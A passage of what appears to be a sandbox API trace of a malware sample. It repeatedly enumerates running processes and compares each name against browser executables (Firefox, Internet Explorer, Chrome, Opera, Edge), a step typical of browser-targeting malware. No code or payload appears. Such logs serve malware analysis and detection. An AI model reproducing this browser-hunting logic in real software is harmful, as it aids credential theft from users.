lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0207.857] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0207.857] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0207.857] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0207.857] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0207.857] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0207.857] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0207.857] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0207.857] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0207.857] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0207.857] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0207.857] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0207.857] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0207.858] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0207.858] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0207.858] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0207.858] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0207.858] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0207.858] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0207.859] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0207.859] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0207.859] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0207.859] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0207.859] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0207.859] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0207.859] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0207.859] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0207.859] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0207.859] lstrcmpiA (lpString1="audiodg.exe", lpString2="opera.exe") returned -1 [0207.859] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0207.859] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0207.860] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0207.860] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0207.860] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0207.860] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0207.860] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0207.860] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0207.860] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0207.860] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0207.860] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0207.860] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0207.860] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0207.860] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0207.861] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0207.861] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0207.861] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0207.861] lstrcmpiA (lpString1="dwm.exe", lpString2="opera.exe") returned -1 [0207.861] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0207.861] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0207.861] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0207.862] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0207.862] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0207.862] lstrcmpiA (lpString1="spoolsv.exe", lpString2="opera.exe") returned 1 [0207.862] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0207.862] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0207.862] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0207.862] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0207.862] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0207.862] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0207.862] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0207.862] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0207.863] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0207.863] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0207.863] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0207.863] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0207.863] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0207.863] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0207.863] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0207.863] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0207.863] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0207.863] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0207.863] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0207.863] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0207.864] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0207.864] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0207.864] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0207.864] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="opera.exe") returned -1 [0207.864] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0207.864] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0207.864] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0207.865] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0207.865] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0207.865] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="opera.exe") returned -1 [0207.865] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0207.865] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0207.865] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0207.865] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0207.865] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0207.865] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="opera.exe") returned 1 [0207.865] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0207.865] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0207.866] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0207.866] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0207.866] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0207.866] lstrcmpiA (lpString1="definitely.exe", lpString2="opera.exe") returned -1 [0207.866] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0207.866] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0207.866] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0207.866] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0207.866] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0207.866] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="opera.exe") returned -1 [0207.866] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0207.866] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0207.867] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0207.867] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0207.867] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0207.867] lstrcmpiA (lpString1="whenever.exe", lpString2="opera.exe") returned 1 [0207.867] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0207.867] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0207.867] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0207.868] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0207.868] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0207.868] lstrcmpiA (lpString1="potentially.exe", lpString2="opera.exe") returned 1 [0207.868] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0207.868] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0207.868] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0207.868] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0207.868] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0207.868] lstrcmpiA (lpString1="seeker.exe", lpString2="opera.exe") returned 1 [0207.868] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0207.868] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0207.869] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0207.869] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0207.869] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0207.869] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="opera.exe") returned -1 [0207.869] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0207.869] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0207.869] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0207.869] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0207.869] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0207.869] lstrcmpiA (lpString1="birth bean.exe", lpString2="opera.exe") returned -1 [0207.869] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0207.869] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0207.870] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0207.870] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0207.870] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0207.870] lstrcmpiA (lpString1="ruby.exe", lpString2="opera.exe") returned 1 [0207.870] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0207.870] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0207.870] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0207.870] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0207.871] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0207.871] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="opera.exe") returned 1 [0207.871] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0207.871] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0207.871] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0207.871] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0207.871] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0207.871] lstrcmpiA (lpString1="smith.exe", lpString2="opera.exe") returned 1 [0207.871] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0207.871] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0207.872] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0207.872] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0207.872] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0207.872] lstrcmpiA (lpString1="spicedespite.exe", lpString2="opera.exe") returned 1 [0207.872] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0207.872] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0207.872] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0207.872] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0207.872] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0207.872] lstrcmpiA (lpString1="wooden.exe", lpString2="opera.exe") returned 1 [0207.872] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0207.872] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0207.873] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0207.873] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0207.873] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0207.873] lstrcmpiA (lpString1="dallasr.exe", lpString2="opera.exe") returned -1 [0207.873] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0207.873] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0207.873] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0207.873] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0207.874] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0207.874] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="opera.exe") returned -1 [0207.874] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0207.874] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0207.874] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0207.874] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0207.874] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0207.874] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="opera.exe") returned -1 [0207.874] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0207.874] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0207.875] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0207.875] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0207.875] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0207.875] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="opera.exe") returned 1 [0207.875] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0207.875] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0207.875] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0207.875] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0207.875] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0207.875] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="opera.exe") returned -1 [0207.875] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0207.875] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0207.876] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0207.876] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0207.876] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0207.876] lstrcmpiA (lpString1="population openings.exe", lpString2="opera.exe") returned 1 [0207.876] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0207.876] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0207.876] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0207.876] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0207.876] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0207.877] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0207.877] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0207.877] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0207.877] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0207.877] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0207.877] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0207.877] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0207.877] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0207.877] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0207.878] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0207.878] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0207.878] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0207.878] lstrcmpiA (lpString1="sppsvc.exe", lpString2="opera.exe") returned 1 [0207.878] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0207.878] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0207.878] lstrcmpiA 